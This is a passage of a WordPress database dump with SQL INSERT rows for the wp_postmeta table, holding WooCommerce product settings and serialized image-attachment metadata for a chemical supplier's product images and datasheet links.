INSERT INTO `wp_postmeta` VALUES (4185, 577, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (4186, 577, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (4187, 577, '_product_version', '2.6.11'); 
INSERT INTO `wp_postmeta` VALUES (4188, 577, '_ywtm_hide_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (4189, 577, '_ywtm_override_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (4190, 577, '_ywtm_priority_tab_reviews', '30'); 
INSERT INTO `wp_postmeta` VALUES (4191, 577, '_ywtm_title_tab_reviews', 'Reviews (%d)'); 
INSERT INTO `wp_postmeta` VALUES (4192, 577, '_product_image_gallery', '1353'); 
INSERT INTO `wp_postmeta` VALUES (4193, 584, '_wp_attached_file', '2016/08/VAZO-67-e1471616707696.jpg'); 
INSERT INTO `wp_postmeta` VALUES (4194, 584, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:496;s:6:"height";i:245;s:4:"file";s:34:"2016/08/VAZO-67-e1471616707696.jpg";s:5:"sizes";a:4:{s:9:"thumbnail";a:4:{s:4:"file";s:34:"VAZO-67-e1471616707696-340x245.jpg";s:5:"width";i:340;s:6:"height";i:245;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:34:"VAZO-67-e1471616707696-250x245.jpg";s:5:"width";i:250;s:6:"height";i:245;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:34:"VAZO-67-e1471616707696-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:34:"VAZO-67-e1471616707696-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"7";s:8:"quantity";d:100;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (4196, 584, '_wp_attachment_backup_sizes', 'a:10:{s:9:"full-orig";a:3:{s:5:"width";i:496;s:6:"height";i:245;s:4:"file";s:11:"VAZO-67.jpg";}s:14:"thumbnail-orig";a:4:{s:4:"file";s:19:"VAZO-67-340x245.jpg";s:5:"width";i:340;s:6:"height";i:245;s:9:"mime-type";s:10:"image/jpeg";}s:19:"shop_thumbnail-orig";a:4:{s:4:"file";s:19:"VAZO-67-180x180.jpg";s:5:"width";i:180;s:6:"height";i:180;s:9:"mime-type";s:10:"image/jpeg";}s:17:"shop_catalog-orig";a:4:{s:4:"file";s:19:"VAZO-67-300x245.jpg";s:5:"width";i:300;s:6:"height";i:245;s:9:"mime-type";s:10:"image/jpeg";}s:16:"shop_single-orig";a:4:{s:4:"file";s:19:"VAZO-67-400x245.jpg";s:5:"width";i:400;s:6:"height";i:245;s:9:"mime-type";s:10:"image/jpeg";}s:18:"full-1471616707696";a:3:{s:5:"width";i:496;s:6:"height";i:245;s:4:"file";s:26:"VAZO-67-e1471616683417.jpg";}s:23:"thumbnail-1471616707696";a:4:{s:4:"file";s:34:"VAZO-67-e1471616683417-340x245.jpg";s:5:"width";i:340;s:6:"height";i:245;s:9:"mime-type";s:10:"image/jpeg";}s:28:"shop_thumbnail-1471616707696";a:4:{s:4:"file";s:34:"VAZO-67-e1471616683417-180x180.jpg";s:5:"width";i:180;s:6:"height";i:180;s:9:"mime-type";s:10:"image/jpeg";}s:26:"shop_catalog-1471616707696";a:4:{s:4:"file";s:34:"VAZO-67-e1471616683417-300x245.jpg";s:5:"width";i:300;s:6:"height";i:245;s:9:"mime-type";s:10:"image/jpeg";}s:25:"shop_single-1471616707696";a:4:{s:4:"file";s:34:"VAZO-67-e1471616683417-400x245.jpg";s:5:"width";i:400;s:6:"height";i:245;s:9:"mime-type";s:10:"image/jpeg";}}'); 
INSERT INTO `wp_postmeta` VALUES (4198, 577, '_wc_review_count', '0'); 
INSERT INTO `wp_postmeta` VALUES (4199, 577, '318_custom_list_file', 'a:2:{s:32:"f8c060b182119a43431c22fe9583bdaf";a:3:{s:4:"name";s:7:"VAZO 88";s:4:"file";s:77:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/VazoT-88-PDS.pdf";s:4:"desc";s:11:"Vazo 88-TDS";}s:32:"862758023d872a0067517bc7b7d88fec";a:3:{s:4:"name";s:16:"Product Overview";s:4:"file";s:97:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/VazoR-General-Information-PUSH-1.pdf";s:4:"desc";s:16:"Product Overview";}}'); 
INSERT INTO `wp_postmeta` VALUES (4200, 593, '_wp_attached_file', '2016/08/Vazo88-e1471618027123.jpg'); 
INSERT INTO `wp_postmeta` VALUES (4201, 593, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:480;s:6:"height";i:213;s:4:"file";s:33:"2016/08/Vazo88-e1471618027123.jpg";s:5:"sizes";a:4:{s:9:"thumbnail";a:4:{s:4:"file";s:33:"Vazo88-e1471618027123-340x213.jpg";s:5:"width";i:340;s:6:"height";i:213;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:33:"Vazo88-e1471618027123-250x213.jpg";s:5:"width";i:250;s:6:"height";i:213;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:33:"Vazo88-e1471618027123-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:33:"Vazo88-e1471618027123-225x213.jpg";s:5:"width";i:225;s:6:"height";i:213;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"6";s:8:"quantity";d:100;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (4203, 593, '_wp_attachment_backup_sizes', 'a:5:{s:9:"full-orig";a:3:{s:5:"width";i:480;s:6:"height";i:213;s:4:"file";s:10:"Vazo88.jpg";}s:14:"thumbnail-orig";a:4:{s:4:"file";s:18:"Vazo88-340x213.jpg";s:5:"width";i:340;s:6:"height";i:213;s:9:"mime-type";s:10:"image/jpeg";}s:19:"shop_thumbnail-orig";a:4:{s:4:"file";s:18:"Vazo88-180x180.jpg";s:5:"width";i:180;s:6:"height";i:180;s:9:"mime-type";s:10:"image/jpeg";}s:17:"shop_catalog-orig";a:4:{s:4:"file";s:18:"Vazo88-300x213.jpg";s:5:"width";i:300;s:6:"height";i:213;s:9:"mime-type";s:10:"image/jpeg";}s:16:"shop_single-orig";a:4:{s:4:"file";s:18:"Vazo88-400x213.jpg";s:5:"width";i:400;s:6:"height";i:213;s:9:"mime-type";s:10:"image/jpeg";}}'); 
INSERT INTO `wp_postmeta` VALUES (4205, 595, '_wp_attached_file', '2016/08/krytox_grey-e1471619032769.jpg'); 
INSERT INTO `wp_postmeta` VALUES (4206, 595, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:275;s:6:"height";i:114;s:4:"file";s:38:"2016/08/krytox_grey-e1471619032769.jpg";s:5:"sizes";a:3:{s:25:"display_product_thumbnail";a:4:{s:4:"file";s:38:"krytox_grey-e1471619032769-250x114.jpg";s:5:"width";i:250;s:6:"height";i:114;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:38:"krytox_grey-e1471619032769-200x114.jpg";s:5:"width";i:200;s:6:"height";i:114;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:38:"krytox_grey-e1471619032769-225x114.jpg";s:5:"width";i:225;s:6:"height";i:114;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"4";s:8:"quantity";d:100;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (4207, 595, '_edit_lock', '1471619133:1'); 
INSERT INTO `wp_postmeta` VALUES (4208, 595, '_wp_attachment_backup_sizes', 'a:2:{s:9:"full-orig";a:3:{s:5:"width";i:275;s:6:"height";i:114;s:4:"file";s:15:"krytox_grey.jpg";}s:18:"full-1471619032769";a:3:{s:5:"width";i:275;s:6:"height";i:114;s:4:"file";s:30:"krytox_grey-e1471618646798.jpg";}}'); 
INSERT INTO `wp_postmeta` VALUES (4209, 595, '_edit_last', '1'); 
INSERT INTO `wp_postmeta` VALUES (4210, 596, '_wp_attached_file', '2016/08/hexion-e1471619003681.jpg'); 
INSERT INTO `wp_postmeta` VALUES (4211, 596, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:275;s:6:"height";i:114;s:4:"file";s:33:"2016/08/hexion-e1471619003681.jpg";s:5:"sizes";a:3:{s:25:"display_product_thumbnail";a:4:{s:4:"file";s:33:"hexion-e1471619003681-250x114.jpg";s:5:"width";i:250;s:6:"height";i:114;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:33:"hexion-e1471619003681-200x114.jpg";s:5:"width";i:200;s:6:"height";i:114;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:33:"hexion-e1471619003681-225x114.jpg";s:5:"width";i:225;s:6:"height";i:114;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"5";s:8:"quantity";d:100;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (4212, 596, '_wp_attachment_backup_sizes', 'a:1:{s:9:"full-orig";a:3:{s:5:"width";i:275;s:6:"height";i:114;s:4:"file";s:10:"hexion.jpg";}}'); 
INSERT INTO `wp_postmeta` VALUES (4213, 598, '_wp_attached_file', '2016/08/Vazo-52-1-2-e1473260080706.jpg'); 
INSERT INTO `wp_postmeta` VALUES (4214, 598, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:479;s:6:"height";i:198;s:4:"file";s:38:"2016/08/Vazo-52-1-2-e1473260080706.jpg";s:5:"sizes";a:4:{s:9:"thumbnail";a:4:{s:4:"file";s:38:"Vazo-52-1-2-e1473260080706-340x198.jpg";s:5:"width";i:340;s:6:"height";i:198;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:38:"Vazo-52-1-2-e1473260080706-250x198.jpg";s:5:"width";i:250;s:6:"height";i:198;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:38:"Vazo-52-1-2-e1473260080706-200x198.jpg";s:5:"width";i:200;s:6:"height";i:198;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:38:"Vazo-52-1-2-e1473260080706-225x198.jpg";s:5:"width";i:225;s:6:"height";i:198;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"5";s:8:"quantity";d:100;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (4215, 598, '_wp_attachment_backup_sizes', 'a:11:{s:9:"full-orig";a:3:{s:5:"width";i:479;s:6:"height";i:198;s:4:"file";s:15:"Vazo-52-1-2.jpg";}s:14:"thumbnail-orig";a:4:{s:4:"file";s:23:"Vazo-52-1-2-340x198.jpg";s:5:"width";i:340;s:6:"height";i:198;s:9:"mime-type";s:10:"image/jpeg";}s:19:"shop_thumbnail-orig";a:4:{s:4:"file";s:23:"Vazo-52-1-2-180x180.jpg";s:5:"width";i:180;s:6:"height";i:180;s:9:"mime-type";s:10:"image/jpeg";}s:17:"shop_catalog-orig";a:4:{s:4:"file";s:23:"Vazo-52-1-2-300x198.jpg";s:5:"width";i:300;s:6:"height";i:198;s:9:"mime-type";s:10:"image/jpeg";}s:16:"shop_single-orig";a:4:{s:4:"file";s:23:"Vazo-52-1-2-400x198.jpg";s:5:"width";i:400;s:6:"height";i:198;s:9:"mime-type";s:10:"image/jpeg";}s:18:"full-1473260066797";a:3:{s:5:"width";i:479;s:6:"height";i:198;s:4:"file";s:30:"Vazo-52-1-2-e1471619693204.jpg";}s:23:"thumbnail-1473260066797";a:4:{s:4:"file";s:38:"Vazo-52-1-2-e1471619693204-340x198.jpg";s:5:"width";i:340;s:6:"height";i:198;s:9:"mime-type";s:10:"image/jpeg";}s:28:"shop_thumbnail-1473260066797";a:4:{s:4:"file";s:38:"Vazo-52-1-2-e1471619693204-180x180.jpg";s:5:"width";i:180;s:6:"height";i:180;s:9:"mime-type";s:10:"image/jpeg";}s:26:"shop_catalog-1473260066797";a:4:{s:4:"file";s:38:"Vazo-52-1-2-e1471619693204-300x198.jpg";s:5:"width";i:300;s:6:"height";i:198;s:9:"mime-type";s:10:"image/jpeg";}s:25:"shop_single-1473260066797";a:4:{s:4:"file";s:38:"Vazo-52-1-2-e1471619693204-400x198.jpg";s:5:"width";i:400;s:6:"height";i:198;s:9:"mime-type";s:10:"image/jpeg";}s:18:"full-1473260080706";a:3:{s:5:"width";i:479;s:6:"height";i:198;s:4:"file";s:30:"Vazo-52-1-2-e1473260066797.jpg";}}'); 
INSERT INTO `wp_postmeta` VALUES (4217, 599, '_wp_attached_file', '2016/08/vertrel-e1471619855523.jpg'); 
INSERT INTO `wp_postmeta` VALUES (4218, 599, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:275;s:6:"height";i:114;s:4:"file";s:34:"2016/08/vertrel-e1471619855523.jpg";s:5:"sizes";a:3:{s:25:"display_product_thumbnail";a:4:{s:4:"file";s:34:"vertrel-e1471619855523-250x114.jpg";s:5:"width";i:250;s:6:"height";i:114;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:34:"vertrel-e1471619855523-200x114.jpg";s:5:"width";i:200;s:6:"height";i:114;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:34:"vertrel-e1471619855523-225x114.jpg";s:5:"width";i:225;s:6:"height";i:114;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"2";s:8:"quantity";d:100;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (4219, 599, '_edit_lock', '1471619732:1'); 
INSERT INTO `wp_postmeta` VALUES (4220, 599, '_wp_attachment_backup_sizes', 'a:1:{s:9:"full-orig";a:3:{s:5:"width";i:275;s:6:"height";i:114;s:4:"file";s:11:"vertrel.jpg";}}'); 
INSERT INTO `wp_postmeta` VALUES (4221, 599, '_edit_last', '1'); 
INSERT INTO `wp_postmeta` VALUES (4223, 602, '_wp_attached_file', '2016/08/vazo-5-e1471620175494.jpg'); 
INSERT INTO `wp_postmeta` VALUES (4224, 602, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:275;s:6:"height";i:114;s:4:"file";s:33:"2016/08/vazo-5-e1471620175494.jpg";s:5:"sizes";a:3:{s:25:"display_product_thumbnail";a:4:{s:4:"file";s:33:"vazo-5-e1471620175494-250x114.jpg";s:5:"width";i:250;s:6:"height";i:114;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:33:"vazo-5-e1471620175494-200x114.jpg";s:5:"width";i:200;s:6:"height";i:114;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:33:"vazo-5-e1471620175494-225x114.jpg";s:5:"width";i:225;s:6:"height";i:114;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"2";s:8:"quantity";d:100;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (4225, 602, '_wp_attachment_backup_sizes', 'a:1:{s:9:"full-orig";a:3:{s:5:"width";i:275;s:6:"height";i:114;s:4:"file";s:10:"vazo-5.jpg";}}'); 
INSERT INTO `wp_postmeta` VALUES (4226, 604, '_wp_attached_file', '2016/08/fluoroextreme-e1471620766628.jpg'); 
INSERT INTO `wp_postmeta` VALUES (4227, 604, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:275;s:6:"height";i:38;s:4:"file";s:40:"2016/08/fluoroextreme-e1471620766628.jpg";s:5:"sizes";a:3:{s:25:"display_product_thumbnail";a:4:{s:4:"file";s:39:"fluoroextreme-e1471620766628-250x38.jpg";s:5:"width";i:250;s:6:"height";i:38;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:39:"fluoroextreme-e1471620766628-200x38.jpg";s:5:"width";i:200;s:6:"height";i:38;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:39:"fluoroextreme-e1471620766628-225x38.jpg";s:5:"width";i:225;s:6:"height";i:38;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"3";s:8:"quantity";d:100;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (4228, 604, '_wp_attachment_backup_sizes', 'a:1:{s:9:"full-orig";a:3:{s:5:"width";i:275;s:6:"height";i:38;s:4:"file";s:17:"fluoroextreme.jpg";}}'); 
INSERT INTO `wp_postmeta` VALUES (4229, 607, '_wp_attached_file', '2016/08/fluoro_bw-e1471621198955.jpg'); 
INSERT INTO `wp_postmeta` VALUES (4230, 607, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:275;s:6:"height";i:114;s:4:"file";s:36:"2016/08/fluoro_bw-e1471621198955.jpg";s:5:"sizes";a:3:{s:25:"display_product_thumbnail";a:4:{s:4:"file";s:36:"fluoro_bw-e1471621198955-250x114.jpg";s:5:"width";i:250;s:6:"height";i:114;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:36:"fluoro_bw-e1471621198955-200x114.jpg";s:5:"width";i:200;s:6:"height";i:114;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:36:"fluoro_bw-e1471621198955-225x114.jpg";s:5:"width";i:225;s:6:"height";i:114;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"5";s:8:"quantity";d:100;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (4231, 607, '_wp_attachment_backup_sizes', 'a:1:{s:9:"full-orig";a:3:{s:5:"width";i:275;s:6:"height";i:114;s:4:"file";s:13:"fluoro_bw.jpg";}}'); 
INSERT INTO `wp_postmeta` VALUES (4232, 610, '_wp_attached_file', '2016/08/Opteon_H_specialty_fluids_SU-e1471621547984.png'); 
INSERT INTO `wp_postmeta` VALUES (4233, 610, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:690;s:6:"height";i:271;s:4:"file";s:55:"2016/08/Opteon_H_specialty_fluids_SU-e1471621547984.png";s:5:"sizes";a:5:{s:9:"thumbnail";a:4:{s:4:"file";s:55:"Opteon_H_specialty_fluids_SU-e1471621547984-340x271.png";s:5:"width";i:340;s:6:"height";i:271;s:9:"mime-type";s:9:"image/png";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:55:"Opteon_H_specialty_fluids_SU-e1471621547984-250x250.png";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:9:"image/png";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:55:"Opteon_H_specialty_fluids_SU-e1471621547984-200x200.png";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:9:"image/png";}s:12:"shop_catalog";a:4:{s:4:"file";s:55:"Opteon_H_specialty_fluids_SU-e1471621547984-225x225.png";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:9:"image/png";}s:11:"shop_single";a:4:{s:4:"file";s:55:"Opteon_H_specialty_fluids_SU-e1471621547984-510x271.png";s:5:"width";i:510;s:6:"height";i:271;s:9:"mime-type";s:9:"image/png";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"1";s:8:"quantity";d:100;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (4234, 610, '_wp_attachment_backup_sizes', 'a:5:{s:9:"full-orig";a:3:{s:5:"width";i:690;s:6:"height";i:271;s:4:"file";s:32:"Opteon_H_specialty_fluids_SU.png";}s:14:"thumbnail-orig";a:4:{s:4:"file";s:40:"Opteon_H_specialty_fluids_SU-340x271.png";s:5:"width";i:340;s:6:"height";i:271;s:9:"mime-type";s:9:"image/png";}s:19:"shop_thumbnail-orig";a:4:{s:4:"file";s:40:"Opteon_H_specialty_fluids_SU-180x180.png";s:5:"width";i:180;s:6:"height";i:180;s:9:"mime-type";s:9:"image/png";}s:17:"shop_catalog-orig";a:4:{s:4:"file";s:40:"Opteon_H_specialty_fluids_SU-300x271.png";s:5:"width";i:300;s:6:"height";i:271;s:9:"mime-type";s:9:"image/png";}s:16:"shop_single-orig";a:4:{s:4:"file";s:40:"Opteon_H_specialty_fluids_SU-400x271.png";s:5:"width";i:400;s:6:"height";i:271;s:9:"mime-type";s:9:"image/png";}}'); 
INSERT INTO `wp_postmeta` VALUES (4235, 613, '_wp_attached_file', '2016/08/Urethane-Conformal.jpg'); 
INSERT INTO `wp_postmeta` VALUES (4236, 613, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5594;s:6:"height";i:3729;s:4:"file";s:30:"2016/08/Urethane-Conformal.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:30:"Urethane-Conformal-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:30:"Urethane-Conformal-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:30:"Urethane-Conformal-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:32:"Urethane-Conformal-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:30:"Urethane-Conformal-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:30:"Urethane-Conformal-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:30:"Urethane-Conformal-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:30:"Urethane-Conformal-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"2";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (4237, 614, '_wp_attached_file', '2016/08/Urethane-Missle.jpg'); 
INSERT INTO `wp_postmeta` VALUES (4238, 614, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:3648;s:6:"height";i:2736;s:4:"file";s:27:"2016/08/Urethane-Missle.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:27:"Urethane-Missle-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:27:"Urethane-Missle-800x600.jpg";s:5:"width";i:800;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:27:"Urethane-Missle-768x576.jpg";s:5:"width";i:768;s:6:"height";i:576;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:29:"Urethane-Missle-1600x1200.jpg";s:5:"width";i:1600;s:6:"height";i:1200;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:27:"Urethane-Missle-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:27:"Urethane-Missle-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:27:"Urethane-Missle-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:27:"Urethane-Missle-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"5";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
